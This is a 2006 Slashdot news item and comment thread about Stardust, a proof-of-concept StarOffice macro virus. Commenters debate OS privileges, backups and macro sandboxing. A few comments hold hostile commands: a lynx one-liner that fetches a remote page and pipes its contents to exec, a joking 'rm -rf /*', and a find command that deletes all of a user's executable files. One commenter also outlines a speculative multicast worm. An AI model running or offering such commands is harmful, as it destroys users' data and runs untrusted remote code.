
First StarOffice Virus Sighted 166

Sam Haine '95 writes "News.com is reporting on the creation of Stardust, a virus which uses macros to attack StarOffice, Sun's office suite. The malware was written as a proof-of-concept code to show what might be possible rather than as a serious attempt to create a new attack vector." From the article: "The pest is written in Star Basic. It downloads an image file with adult content from the Internet and opens that file in a new document, according to Kaspersky's posting."
  • by yagu ( 721525 ) * <{yayagu} {at} {gmail.com}> on Thursday June 01, 2006 @01:09PM (#15446420) Journal

    First, a question, I don't know what the default setting for StarOffice is as to macro execution. Is it turned on by default?

    Regardless, it's no secret or mystery even if by default macro execution is on in StarOffice, the vulnerability is in the OS infrastructure. If this happened on a Un*x machine (Sun, HP, Linux, BSD), the damage would be confined and limited to what the user had unprotected. It would be highly unusual for a Un*x user hit with a StarOffice macro exploit to have enough exposure to compromise the system.

    OTOH, while it is getting better in Windows, there are still far too many users set up with admin privileges, and we're a long way from sufficient education and reconfiguration such that a typical Windows user has safe access so exploits succeed in only local impact.

    Macros in documents are almost evil, I hate that everything sent somehow has to have its own life-force, but in properly configured systems, they're manageable. (I don't object to macros, I use them all the time, but to make them "required" to get the full effect of e-mail is annoying.)

    • by Otter ( 3800 ) on Thursday June 01, 2006 @01:22PM (#15446551) Journal
      If this happened on a Un*x machine (Sun, HP, Linux, BSD), the damage would be confined and limited to what the user had unprotected. It would be highly unusual for a Un*x user hit with a StarOffice macro exploit to have enough exposure to compromise the system.

      We have this discussion all the time, but once more can't hurt: on single-user Linux systems or Unix workstations, losing $HOME is far more serious than losing system files.

      • I agree. It's not like if my /home got deleted I'd be all "well, at least my frozen bubble playing is uninterrupted!"
      • People who don't backup /home every night deserve everything they get.
        • by I'm Don Giovanni ( 598558 ) on Thursday June 01, 2006 @01:56PM (#15446914)
          "People who don't backup /home every night deserve everything they get."

          But even if you did backup every night, what if some malware corrupted some documents in /home? Maybe changed some vital data in a spreadsheet? Maybe the change would be too subtle to notice, and your spreadsheet would start producing incorrect calculations due to the incorrect data, unbeknownst to you. And when you did your nightly backup, guess what, the corrupted spreadsheet gets backed up as well, so now your backup store is corrupt.
          • 1) That's a lot of maybes. Viruses used to pull cute corruption tricks but I haven't seen that behaviour since I was scanning 5-1/4" floppies for boot sector viruses.

            2) I keep dailies for a week and monthlies essentially forever, i.e. burned to CD/DVD. Not perfect, but I wouldn't be totally hosed.
      • by khasim ( 1285 ) <brandioch.conner@gmail.com> on Thursday June 01, 2006 @01:39PM (#15446742)
        If you're in a company and a "virus" takes out one of the system files on one of your servers ... but the data is safe, you have less of a problem than if a "virus" leaves the server intact, but deletes all of your data.

        It's always about the security of the data.

        Which is why part of the OS's job is to restrict the ability of regular users as much as possible.

        When all that is in danger is your personal home directory, that's really as good as the OS can be.

        If we're talking single user/home machines ... the risk is greater that your hard drive will fail before you get a "virus" on your Linux box. With a failed hard drive (and no backup), you've lost all your data. At some point, it is up to the admin (the user in this case) to back-up his/her data. There is a point at which the OS/app's responsibility ends and the admin's begins.
        • It's always about the security of the data.

          No, as GP said, the security of Information is more important. If a virus deletes the user's $HOME/Documents files I bet he will be *freaking* pissed after someone in the 1337U8UN7U forum tells him not to worry as the stability of the system is not going to be affected.

          • If a virus deletes the user's $HOME/Documents files I bet he will be *freaking* pissed after someone in the 1337U8UN7U forum tells him not to worry as the stability of the system is not going to be affected.

            Let's say that you and I both get some bit of malware, you on WinXP (where there's a 99.44% chance your account has Administrator privs), and me on Linux, logged in as "ron", who doesn't have root privs.

            How do we recover?

            You must reinstall WinXP and every application, then all data. Much time (2 weeknight
      • losing $HOME is far more serious than losing system files

        It really isn't. Any user who cares about their stuff both should and could back up $HOME every night; it's small, and the delta set is even smaller, so backing up is fast and cheap. Any user who cares about their stuff should, but often cannot, back up / every night, purely due to practical issues.

        Moreover, when $HOME gets wiped, you just have to lay your data back down -- call it ten minutes if you do a complete backup nightly to a DVD, or half an h
        • by chill ( 34294 ) on Thursday June 01, 2006 @02:04PM (#15446997) Journal
          If I lose /, I can just download a clean distro. If I lose /home, I'm screwed. /home is infinitely more important on a single-user system.

          Actually, a complete reinstall on a Linux system is so trivial it doesn't matter -- as long as /home is a separate partition. And, of course, you have some skill with the system.

          I don't, nor do I know anyone that does, back up their /home folder daily. I do back it up weekly to a DVD-R, but nightly? The process is too much of a PITA. *CRITICAL* files are backed up, but there is so much that isn't critical, I don't bother.

          What I found was easy was to create a folder for all the updates I have installed (.tgz in my case, but .deb or .rpm for the non-Slackware types) and back THAT up to a CD-R on a regular basis. Then, I can do a reinstall -- skipping /home if possible -- from clean distro disks in maybe 20 minutes. Follow that up with a quick "upgradepkg /mnt/cdrom/updates/*.tgz" and I'm right back to where I was before disaster struck.

          I haven't played with it on Slackware, but on Fedora/Red Hat and their derivatives you could create a kickstart disk after your initial install to automate the reinstall. No need to choose timezones, package sets or anything. Very handy.

          I would like to point out that this is so damned easy because Linux DOES NOT USE A REGISTRY like Windows, instead saves global configs in /etc and user configs in ~. The #1 complaint I had from people restoring Windows from scratch was that they had to waste so much time going back and tweaking the configs on all the software they use. Very, very time consuming.

            -Charles

          • I used to use cron to make a nightly tarball of my FreeBSD system's home directory when I ran that as my only OS. With two hard drives the process was trivial and fairly unnoticeable. Just set up the other drive as a /backup or so. Have cron.daily do a "tar -czf /backup/nightly.tar.gz /home". The details are sketchy as this was years ago, but it worked nicely and could easily have been done weekly instead of daily.

            I did this more to be able to track a change in code in case something happened. This should

          • "I don't, nor do I know anyone that does, back up their /home folder daily."

            My mom works on a (OS X) Mac (small home office), so far safe as houses as viruses are concerned. Still her machine is backupped (is that actually a word?) on a 7-day-basis, i.e. every day of the week her user-directory is written to a different backup-set on a separate HD (= 7 different backups, one for each day of the week). Every 3-4 weeks I burn a snapshot of all her data onto DVDs. Why?

            It may seem like overkill, but I set t

      • Mandrake stores the user's backups in a read-only (for normal users) directory. So the virus can damage the user's home dir, but yesterday's (or last week's) backup will remain intact, because only root can hose it and not the user or the virus.
      • Yeah, we have this discussion all the time, and it drives me crazy. The most important files to the user are his own, but the attacker is much more interested in the system files, to create a botnet, or an IRC server, or whatever.

        More importantly, compared to the mess that we have on windows, it can be trivial to remove spyware. A simple command can do it. For example:
        find / -user "$ME" -type f -perm /111 -exec rm -i {} \;

        So even though a virus in userland can do serious damage, it is in a more vulnerable pos
      • > losing $HOME is far more serious than losing system files.

        I would have to disagree. It is much, much easier to (backup and) recover $HOME with the appropriate precautions than to tune an OS for optimal performance.

        On my machine, an automatic, periodic backup is made of $HOME by a cron job to my other disk (which requires root access). With only userland privileges, no virus will be able to get to that backup. Restoring a backup is as simple as a tar xvfz /path/to/backup. Capital damage: 5 minutes to re
        • Most users don't back up though. So while for people who DO, losing ~ isn't horrible, for 95+% of people out there it's the end of the world.

          I've got data so scattered around my hard drive that there's no hope of doing any sort of reasonable backup right now for instance. It's my failing, and some time when I have time I plan to go through and sort stuff out, but right now if I lose my data you might as well toss my computer off the roof.
      • Losing $HOME, for anyone who cares about their data enough anyway, means restoring from backup (ie, somewhere outside $HOME, even if it's just in another dir). If something outside $HOME is compromised though, then that user has risked many other systems and users; not just himself. In doing so, he made the 'net more difficult to police, and exposed himself to future troubles. We're all connected now.
      • We have this discussion all the time, but once more can't hurt: on single-user Linux systems or Unix workstations, losing $HOME is far more serious than losing system files.

        I think you're missing the point. Sure, for most users, losing $HOME is as good as losing their entire harddrive. But $HOME can be very easily backed up - some distros can even be setup to do an automatic backup for you. Or, if you're really paranoid, could even run StarOffice with its very own user. The tools to protect i
      • We have this discussion all the time, but once more can't hurt: on single-user Linux systems or Unix workstations, losing $HOME is far more serious than losing system files.

        That depends on what you keep in $HOME.

        Personally, I keep my data on separate partition mounted on, say, /data or something like that.

        Most of what's in my home directory is just stuff I've downloaded and my Gnome/KDE settings, etc. If I lose those, the system will just recreate them. Big deal. So I have to go in and click on a few dia
      • We have this discussion all the time, but once more can't hurt: on single-user Linux systems or Unix workstations, losing $HOME is far more serious than losing system files.

        Once more for this response can't hurt, either: losing one user's $HOME is far less serious than losing every home directory on the box plus the box itself maliciously attacking other parts of the network.
    • Regardless, it's no secret or mystery even if by default macro execution is on in StarOffice, the vulnerability is in the OS infrastructure. If this happened on a Un*x machine (Sun, HP, Linux, BSD), the damage would be confined and limited to what the user had unprotected. It would be highly unusual for a Un*x user hit with a StarOffice macro exploit to have enough exposure to compromise the system.

      I partially agree with you. Most office software on a normal *nix workstation, however, would have sufficie

    • I think that protecting the user's own data is sufficient reason to blame this on the app writer, not the OS. Yeah, it's the OS's fault if rootkit-level harm can be done, but I think of that as a whole separate problem. Huge amounts of damage can be done even to the user's sandbox, including disclosure of private information (which isn't the OS's fault, either, if the app is giving its macros access to sockets).

      There's plenty of blame to go around, but it points out a general clue: writing secure generalize
      • Huge amounts of damage can be done even to the user's sandbox, including disclosure of private information (which isn't the OS's fault, either, if the app is giving its macros access to sockets).

        I fault the OS for not giving sufficient granularity of permissions for applications. The user should decide if the program gets access to sockets, and if they are real sockets or virtual ones. It should also have reasonable defaults that let the user decide if their word processor can access the internet or open

        • <Blockquote>I fault the OS for not giving sufficient granularity of permissions for applications.</blockquote>

          Appropriate "sandbox" security model depends on what an application is supposed to be doing; any application that provides a scripting facility ought to provide an appropriate internal security model as well. Arbitrary scripts should not have access to the full range of permissions available to the application running them unless the user has specifically elected to allow that, or unless
          • Appropriate "sandbox" security model depends on what an application is supposed to be doing

            Agreed, but a reasonable default should be applied to any software installed and can be modified to become less restrictive as the user tries to use it for more tasks and approves more uses for it.

            Arbitrary scripts should not have access to the full range of permissions available to the application running them unless the user has specifically elected to allow that

            I very much agree.

            P.S. the blockquote tag is n

    • If this happened on a Un*x machine (Sun, HP, Linux, BSD), the damage would be confined and limited to what the user had unprotected. It would be highly unusual for a Un*x user hit with a StarOffice macro exploit to have enough exposure to compromise the system.
      For me, the system is the least valuable area. I have system cds and if it gets borked, I can reinstall and reconfigure. A hassle "yes", end of the world "no". What concerns me is all the irreplaceable content in my home directory. In my home dir, I have all the privileges I need to ruin it all. Now, I keep backups because I know that all computers always fail (at some point in time), but most people are pretty cavalier about backing up stuff. Of course, when I backup, I only backup my data because really, the system is stupidly easy to replace. A person who loses all their baby pics due to a malicious macro isn't really going to care that their printer config is still good.
      • Hence the adage, "If you don't have a backup, you don't have data."

        Flood, fire, virus, crash. Really doesn't matter, gone is gone.

        Now what's more dangerous is a virus/script that changes figures and words in documents. It's likely you'll overwrite your backups and only have corrupt information.

        Hmm, here is an idea, only have the virus corrupt data on files that have not been accessed in the last (x) days, 30 to 60 sounds like a good number, by the time most people notice it will be too late.
    • First, a question, I don't know what the default setting for StarOffice is as to macro execution. Is it turned on by default?

      Sort of. There is a "security" setting in the preferences that is set to "medium" by default meaning that macros will require confirmation before they execute unless they are from a trusted source. No trusted sources are defined by default.

      Of course lots of users will agree to pretty much anything the machine asks (the website wants to steal all your money and reformat your disk bef

  • by Anonymous Coward on Thursday June 01, 2006 @01:09PM (#15446423)
    What? No link to the "adult content?"
  • Virus!? (Score:5, Funny)

    by Kesch ( 943326 ) on Thursday June 01, 2006 @01:10PM (#15446425)
    It downloads an image file with adult content from the Internet and opens that file in a new document, according to Kaspersky's posting.

    I don't call that a virus, I call it a feature.

    Hopefully the next version will allow you to enter keywords to guide the image downloader.
  • virus? (Score:5, Funny)

    by gEvil (beta) ( 945888 ) on Thursday June 01, 2006 @01:12PM (#15446442)
    It downloads an image file with adult content from the Internet and opens that file in a new document

    That's no virus, that's a productivity tool!
  • A Virus (Score:4, Insightful)

    by CastrTroy ( 595695 ) on Thursday June 01, 2006 @01:12PM (#15446445)
    Is this really a virus? It downloads and displays an image with adult content, and displays it. It doesn't run any malicious code, doesn't touch your file system, and doesn't leave any trace after it has run. Sure, you may get in trouble at work, if it downloads the single image, but I think that most IT departments would understand, and wouldn't be able to do much for you for downloading a single image with adult content.
    • No malicious code (Score:3, Insightful)

      by Duds ( 100634 )
      If you're at the wrong kind of workplace, suddenly having porn on your screen is pretty bloody malicious.
    • Re:A Virus (Score:4, Insightful)

      by Golias ( 176380 ) on Thursday June 01, 2006 @01:21PM (#15446534)
      A "Proof of concept" malware example for a non-Microsoft product, such as StarOffice or OS X, is demonstrated in a controlled lab: Big news!

      An actual virus which utterly cripples Windows PC's is discovered in the wild: Business as usual.

      That's pretty much all you need to know about Windows and MS-Office.
    • Yes, it shows all the characteristics of a virus - it attaches itself to something & self propagates. It's not a particularly malicious or effective Virus, but it's most certainly a virus.
      • I saw nothing in the article that indicated anything about it being able to propagate.
        • Not in the linked slashdot article, I read this from PC World [pcworld.com] this morning:

          Typically, a virus using macros infects a template, which is then read when opening other documents and infects those also, Schouwenberg said. The Stardust virus is contained in a StarOffice document that uses macros and then infects a global template.

          If a user opens a document infected with Stardust, every StarOffice text document, with a ".sxw" extension, or document template, with a ".stw" extension, will be infected, Schouwenberg

    • Re:A Virus (Score:3, Interesting)

      by packetmon ( 977047 )
      What do you think would happen if someone scripted something into it... Remember it's a proof of concept. Doesn't mean someone wouldn't be able to do something uberdumb in a shell...

      lynx -dump http://www.justpasha.org/folk/rm.html|sed -n '4p'|awk '{print $1,$2,$3}'|xargs exec
      • rm -rf / (which based on the contents of the url you referred to above, I assume is the command you would be invoking with the one-line script) would have no serious effects on a Unix system unless you were running as root. It would have the annoying consequence of removing every file on the system that is owned by the current user, but in all honesty, the responsibility of backing up one's own documents is a small enough scope project that there's no reason people shouldn't be doing that regularly. Unfor
  • ... is do you actually get to see the adult content whilst you get infected? it'd make it so much less annoying.

    I doubt this is really going to turn into anything major though, Star still has security through obscurity. MS office is taking all the hits on the macro virus front.

    I'm actually fairly pleased that they have done this though, it will make people look further and work to make it even more secure
  • Learning period (Score:5, Insightful)

    by suv4x4 ( 956391 ) on Thursday June 01, 2006 @01:12PM (#15446452)
    The more open source products get used, the more their authors will realize that it's not enough to be l33t to write a secure product.

    It will also require tough and down-to-the-ground tough work such as researching the worms out there and patching the product out.

    Another thing is: you can never "fix" the user, there will always be the guys to run attached executables that promise hot porn and FREE MONY!.
    • Ha. One of these days an offer is going to work, and I'll have free pron and FREE MONEY. Then we'll see who's laughing.
  • POC != virus (Score:2, Insightful)

    by Anonymous Coward

    proof of concept is not a virus, sure it could be, but until it's in the wild it's not really

  • by MagicM ( 85041 ) on Thursday June 01, 2006 @01:13PM (#15446465)
    If you want to trick someone into viewing an image, why not just embed the image in the document?

    Where is the "proof" (and the "virus") in this "proof of concept virus"?
    • The point is that the image is downloaded and displayed without the user doing anything other than opening the document. The 'proof' is that the code executed even if the user did not want it to. The download-and-display-an-image code could easily be replaced with more malicious code. That is the 'virus' part.
      • Here's my new virus. I put it in a spreadsheet, it's just 1 line of code. =SUM(A1:A50). When put in cell A51, it automatically gets run every time you load the spreadsheet, and will run when you change the contents of A1 through A50. Just because you can make a program perform a function without user interaction doesn't mean you can run malicious code that will mess with the system/user files, or mess with the hardware in malicious ways.
      • No, that would be the malware part. To be a virus, it needs a method of propagating itself to other systems and files. This may have that, but it's not explicitly stated in TFA or its links.
  • Bypass mechanism (Score:3, Insightful)

    by 16K Ram Pack ( 690082 ) <(moc.liamg) (ta) (dnomla.mit)> on Thursday June 01, 2006 @01:16PM (#15446498) Homepage
    Not enough specifics. Does this bypass the "do you want to run macros?" because if so, it's a virus, if not, it's a stupid user virus.

    I'm all for protecting users from their own stupidity, but in the end, there's a point where people stop having any power at all.

    • Does this bypass the "do you want to run macros?" because if so, it's a virus, if not, it's a stupid user virus.


      Running macros in a word-processor document shouldn't (by default) be "all-or-nothing"; they ought to run in a secure sandbox that requires user intervention to perform dangerous tasks like, say, modifying the global template (or, arguably, any external file), even if the user account has permission to run them.
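
As an added example (not part of any comment in this thread, and not code from Kaspersky or the StarOffice project): a check a mail gateway or file server could run on `.sxw`/`.stw` files before a user ever reaches the macro prompt discussed above. It assumes the OpenOffice.org 1.x package layout, in which a document is a ZIP archive and Basic libraries sit under a `Basic/` directory; the keyword list is a heuristic chosen for this illustration and the sample documents are constructed in memory.

```python
import io
import re
import zipfile
import xml.etree.ElementTree as ET

# Library index files: they describe a library but hold no Basic source.
INDEX_FILES = {"script-lc.xml", "script-lb.xml"}
MAX_MODULE_BYTES = 1_000_000  # do not inflate oversized archive members

# Heuristic only: Basic statements that reach outside the document.
RISKY = {
    "loads a URL or file": re.compile(r"\bloadComponentFromURL\b", re.I),
    "runs a program": re.compile(r"\bShell\s*\(", re.I),
    "deletes a file": re.compile(r"^\s*Kill\b", re.I | re.M),
    "writes a file": re.compile(r"\bFor\s+(Output|Append)\b", re.I),
    "remote URL literal": re.compile(r"\"(https?|ftp)://", re.I),
}


def module_source(xml_bytes):
    """Return the Basic source held as text inside a module XML file."""
    try:
        root = ET.fromstring(xml_bytes)
    except ET.ParseError:
        # Malformed XML is still worth inspecting as raw text.
        return xml_bytes.decode("utf-8", "replace")
    return "".join(root.itertext())


def scan_package(data):
    """Map each non-empty Basic module path to its sorted findings.

    Returns None when the bytes are not a ZIP package at all, and an
    empty dict when the package carries no Basic source.
    """
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return None
    report = {}
    with zf:
        for info in zf.infolist():
            parts = info.filename.split("/")
            # Expect Basic/<library>/<module>.xml
            if len(parts) != 3 or parts[0] != "Basic":
                continue
            if parts[2] in INDEX_FILES or not parts[2].endswith(".xml"):
                continue
            if info.file_size > MAX_MODULE_BYTES:
                report[info.filename] = ["module too large to inspect"]
                continue
            src = module_source(zf.read(info))
            if not src.strip():
                continue  # empty module: nothing to run
            report[info.filename] = sorted(
                label for label, rx in RISKY.items() if rx.search(src)
            )
    return report


# Constructed sample module (not the Stardust code): fetches a remote file
# and opens it as a new document, the behaviour described in the summary.
SAMPLE_MODULE = """<?xml version="1.0" encoding="UTF-8"?>
<script:module xmlns:script="http://openoffice.org/2000/script"
 script:name="Module1" script:language="StarBasic">Sub Main
  url = "http://example.invalid/picture.jpg"
  StarDesktop.loadComponentFromURL(url, "_blank", 0, Array())
End Sub</script:module>"""


def build_sample(with_macro):
    """Build a minimal constructed .sxw-style package in memory."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("mimetype", "application/vnd.sun.xml.writer")
        zf.writestr("content.xml", "<placeholder/>")
        zf.writestr("Basic/Standard/script-lb.xml", "<placeholder/>")
        if with_macro:
            zf.writestr("Basic/Standard/Module1.xml", SAMPLE_MODULE)
    return buf.getvalue()


if __name__ == "__main__":
    for name, blob in (("clean.sxw", build_sample(False)),
                       ("macro.sxw", build_sample(True)),
                       ("junk.sxw", b"not a zip")):
        result = scan_package(blob)
        if result is None:
            print(f"{name}: not a ZIP package")
        elif not result:
            print(f"{name}: no Basic modules")
        for path, findings in (result or {}).items():
            print(f"{name}: {path}: {', '.join(findings) or 'macro present'}")
```

A module with no keyword hits is still reported (with an empty findings list), since the presence of any macro in an unsolicited document is the signal that matters.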

  • "It downloads an image file with adult content from the Internet and opens that file in a new document, according to Kaspersky's posting." What a great feature! Jokes aside, this actually could be dangerous if used correctly. The proof-of-concept is only demonstrated with a porn image, but imagine what could potentially be used in place of the adult content..
    • "but imagine what could potentially be used in place of the adult content.."

      It is my experience that stuff like this is only spread through "adult images"... they just go to what sells, and evidently on the internet, that's pr0n
    • Hmm, maybe I need to start using Star Office after all.
  • To qualify as a virus, it must be capable of propagating somehow, yet there is nothing in the article that indicates that it could be adapted to do this.

    This so-called virus, therefore, is just a trojan.

    • Get used to it. 99.9999% of windows "viruses" are just people dumb enough to go "OOOH LOOK IT SAYS IT'S A SCREENSAVER OF PONNIES!" rather than you know, viruses.
      • But when you execute that screensaver, it emails itself to other dumb windows users. Does this supposed OpenOffice 'virus' have any form of replication, human-assisted or otherwise? Without some form of replication, this is less of a virus than some Unix shell script that reads something like:

        rm -rf /* #This virus uses the honour system. Please email this to all your friends before executing as root

        • True (and I'm so tempted to see if a windows version of your example would actually work) but the point is you'll have to live with all malicious code being called a virus because the great unwashed doesn't know any different.
  • by packetmon ( 977047 ) on Thursday June 01, 2006 @01:18PM (#15446513) Homepage
    I've floated the idea of a multicast based worm capable of infecting anyone who is accessing a multicast stream. I came up with this idea after some CCNP studies while doing some multicast tests. For those who need a briefer on how multicast works: What is Multicasting ? Multicasting is a technique developed to send packets from one location in the Internet to many other locations, without any unnecessary packet duplication. In multicasting, one packet is sent from a source and is replicated as needed in the network to reach as many end-users as necessary.

    In my theory, a virus creator need create say a corrupted image, sound, etc., and send it through networks as a spoofed source. For example, MSN, AIM, Yahoo! messengers all stream annoying advertisements, so what's to stop someone from creating a packet injection tool to stream a virus through to everyone listening for the multicast and infect their machine.

    Let D=Disney A=Attacker M=Multicast_Address DST=Destination... If A spoofs D sending bad data to M's DST... How many machines can possibly get infected. The framework is there and the possible outcome would be mass infections on a worse level than any worm seen. Of course the whole notion is conceptual but I'm sure it can be done.

    Anyhow in relation to the article, there is no mention of which operating system this PoC affects but I'm sure it will only be a matter of time before someone creates all sorts of perl, sh, python scripts to try and make Unix zombies or so. Luckily I know of no colo places using StarOffice on big piped networks, so DDoS drones are unlikely to come out of this. Simply infected machines... Will be strange to see what else comes out of this.
    • The framework is there and the possible outcome would be mass infections on a worse level than any worm seen. Of course the whole notion is conceptual but I'm sure it can be done.

      The reason this won't work is that multicast is blocked by a large percentage of edge routers. Without widescale use of multicast, your PoC would cause little harm. We don't have widescale use of multicast...as one could figure out from the fact you felt it necessary to include a DEFINITION of multicast in your post...assumin

      • And, unless I'm much mistaken, one of the reasons multicast is not in widescale use is because of this type of vulnerability.

        The most important blockage to multicast, according to someone I know who worked at AT&T, is that ISPs don't know how to bill for it.

        If you're a customer of AT&T and you send 1 packet into AT&T's network, and it causes 20 packets to leave AT&T's network, AT&T (and other major ISPs) don't have any facilities to bill you for that, and can't even decide if you're
    • Will be strange to see what else comes out of this.

      Not a lot, since it is NOT A VIRUS. It doesn't infect any system files, nor can it reproduce itself. Read the other comments above.

  • by Opportunist ( 166417 ) on Thursday June 01, 2006 @01:25PM (#15446582)
    Me? Looking at porn at work? Noooo, sorry, must be that virus goin' round.

    A heartfelt THANK YOU to the author!
  • Thanks! (Score:3, Funny)

    by Chris Bradshaw ( 933608 ) * on Thursday June 01, 2006 @01:35PM (#15446688)
    "proof-of-concept"

    Cool... Thanks for the idea!

    Respectfully Signed,
    Anonymous Redmond Washington Resident

  • I am sure that this announcement has nothing whatsoever to do with the fact that Kaspersky sells virus checkers for Linux.

    Kaspersky has products for Linux file servers and mail servers -- although I cannot find anything beyond a price on their website, so perhaps what they have is a product that checks for Windows viruses but happens to run under Linux.
  • OpenOffice too! (Score:3, Informative)

    by levell ( 538346 ) on Thursday June 01, 2006 @01:43PM (#15446772) Homepage
    Although the summary doesn't explicitly say it, the article confirms that this affects OO as well as StarOffice
  • Yawn (Score:2, Interesting)

    by jofi ( 908156 )
    So like every win32 virus it isn't a spawn of already existing code, and someone had to write it using an existing API or scripting engine that anyone can use and has already used for otherwise legitimate purposes? Get rid of scripting engines and APIs. Problem solved.
  • Proof of security (Score:3, Insightful)

    by MobyDisk ( 75490 ) on Thursday June 01, 2006 @01:49PM (#15446833) Homepage
    This virus doesn't do any damage. Is that because Star Basic runs in a sandbox and can't actually do damage? Or is it because the proof-of-concept virus didn't want to do any damage? If there is a sandbox, all this did is prove how secure Star Office is, not how vulnerable it is.
  • by xutopia ( 469129 ) on Thursday June 01, 2006 @01:50PM (#15446840) Homepage
    Pardon me for asking but doesn't the definition of a virus include duplication? All I hear is that some code can download a picture. How does it "reproduce" itself and infect other stations?
    • Pardon me for asking but doesn't the definition of a virus include duplication? All I hear is that some code can download a picture. How does it "reproduce" itself and infect other stations?

      It doesn't, macros are of the "Trojan" variety. Personally, I think we should call the whole virus/worm/trojan category "Internet Transmitted Diseases", or ITDs for short, so that they're scarier to the non-tech crowd.
    • Well macro viruses from the original definition do exist. Many of them would launch when opening a word file, infect all other word files on the computer and send an attachment to everyone in the address book. Of course these only work on MS Office.
  • hm.. (Score:2, Informative)

    by DoctorDyna ( 828525 )
    It seems as though they intend "proof of concept" to mean "Yes, it *IS* possible to manipulate this software with a virus, had we wanted to."

    Just because all it does is download porn, doesn't mean that it couldn't download a shell script that wipes out the MBR on your hard disk.

    • Just because all it does is download porn, doesn't mean that it couldn't download a shell script that wipes out the MBR on your hard disk.

      OTOH, it also doesn't demonstrate that it could download such a shell script and cause it to be executed without user intervention.

      So its not really a "proof of concept" as regards that particularly capacity at all. The fact that it doesn't show that you can't do it is meaningless, that tells you nothing you didn't know without the so-called "proof of concept".

    • Of course, because after all everyone runs StarOffice as a user that has direct write access to their /dev/hdX nodes. Just because you are a Windows user that doesn't understand the concept of separation of privilege because MS never bothered, doesn't mean that it doesn't exist. (Er, that's of course assuming you aren't running StarOffice on a Windows system, in which case the vulnerability is an MS one anyway)
  • by sootman ( 158191 ) on Thursday June 01, 2006 @01:59PM (#15446938) Homepage Journal
    Both StarOffice users have been contacted and were warned to be careful.
    • Graboid (975267) on Thursday June 01, @05:14PM - Modded -1 Flamebait:

      "To both users of Open Office. I'll bet they're shaking in their boots!"


      sootman (158191) on Thursday June 01, @05:59PM - Modded +5 funny:

      "Both StarOffice users have been contacted and were warned to be careful."


      /. moderation at its finest there! Surely the second post should also have been flamebait or at least redundant? Oh wait... one's talking about OOo - must protect our open source masters!!

  • That publishing or distributing information in *any* 'word processor' format is just silly. The only time you should send or accept a 'word processor' format file from anyone is when you are specifically collaborating with that person to co-produce that document, and you have agreed in advance to use that specific format.

    And even then it would make sense to use plain text to collaborate on the *content* of the document, and then have one person do the 'typesetting' in an appropriate application once the co
    • And even then it would make sense to use plain text to collaborate on the *content* of the document, and then have one person do the 'typesetting' in an appropriate application once the content is complete. Content update/edits would go back to the plain text, and then re-typeset the new version.

      Good luck convincing people to give up Word for TeX, sensible as your idea is.
